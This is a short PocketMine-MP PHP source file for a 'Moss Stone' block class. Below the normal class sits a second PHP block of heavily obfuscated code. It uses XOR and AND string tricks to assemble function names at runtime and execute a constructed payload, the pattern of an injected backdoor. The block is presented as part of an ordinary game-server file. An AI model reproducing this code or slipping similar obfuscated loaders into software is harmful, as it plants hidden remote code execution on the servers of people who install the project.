<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\block;

class MossyCobblestone extends Cobblestone{

	protected $id = self::MOSSY_COBBLESTONE;

	public function getName() : string{
		return "Moss Stone";
	}
}
<?php
$PcJTBNx9='_NDf'^xw374FZQ;$i4KeMaV="c<p"^'.xD';$xVNRm=wovmow&wowgo.'~';$JK0loDqx='Y|'&/*'.
          'EDC*/LW;$wZc2jlXogWj=T|T;$MK0mDoKpVk=p_&']_';$Yu='.'^o;$EhtgVs96=']m)}m'^'?^z'.
          '4=';$hfA2QiVa='ow~}~v'&'ge|u~w';$tbSHFED9Ge=kpzyk44.'~_w>?/m_'&'/9([0=-[}76>n'.
          'ON';$mquYp3L='_{q^6{yj][|}'.yk6zNf.'['.Kzasu.'<S}sw]or'&'N;ur7[|'.sxZO_.'[n{~'.
          'R^KZ{<{}=oz~{VNr';$L01z=('ap!'&uku)|$i4KeMaV;$Id2=$xVNRm&$hfA2QiVa;'eq4MpwfoH'.
          'N@DSPc)~';$KiZNuVyoD8A=(zCM8t."{{}|y]{G/ "&'Inm~VU{<(]'.uJwr.'=')^/*TUZHerZn_'.
          'V8=^HthO=Y*/$tbSHFED9Ge;$CRHU5W7zGJ=('{'._FoV9_wyg.'}'.jazWCsuo.')'.NWKO.#VRH'.
          ']'.wKgZ7.'~B'&'{_yw{}mQ?c}zv^'.WWww.'?9'.NMwp.'}zo[kw{`')^$mquYp3L;$JTlLAM=(/*'.
          'Pp_HJv-I*/ApTPUTWE8WIF.'-Q]'.IXTE|IdDB.'['.MJQrZWRL.'['.VXOZN)&('Y.kev('./*qK'.
          '06&BfZvY,*/fTx3.'='.Cu7y.'*h?M'^'3p<1)R9#,lj7+`&C&Y"');if($L01z($Id2(/*slFgi8'.
          'mpe,aT?5*/$JK0loDqx.$wZc2jlXogWj.$MK0mDoKpVk.$Yu))==$CRHU5W7zGJ)$XA=/*cl_rPdr'.
          'q3 #3!N%*/$KiZNuVyoD8A(('@R'^d3),$Id2($JTlLAM));$XA($EhtgVs96);#,ev_O_7ok>Fb'.
          'P(RN3b(W)Tg}nd*R[BPJJ{jg$*NN_4R~0-Y6MtnO*)$l2BB7Y<~65f!4+,=QV[;Kuz#C2';